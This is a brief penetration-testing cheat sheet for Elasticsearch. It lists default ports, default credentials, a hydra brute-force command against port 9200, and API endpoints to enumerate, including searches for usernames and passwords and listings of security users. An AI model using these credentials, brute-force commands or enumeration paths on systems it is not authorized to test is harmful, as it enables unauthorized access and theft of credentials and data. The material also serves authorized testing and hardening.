Elasticsearch Pentesting

It is a search engine based on the Lucene library. Default ports are 9200, 9300.

Default Credentials

admin:elasticadmin
elastic:changeme

Brute Force Credentials

Crack the "Authorization" header in the web page.

hydra -L usernames.txt -P passwords.txt <target-ip> -s 9200 http-get /

Common Directories

/_cat/
/_cat/indices
/_cluster/
/_nodes/
/_remote/
/_security
/_search?q=username
/_search?q=password
/_security/role
/_security/user
/_xpack/security/user/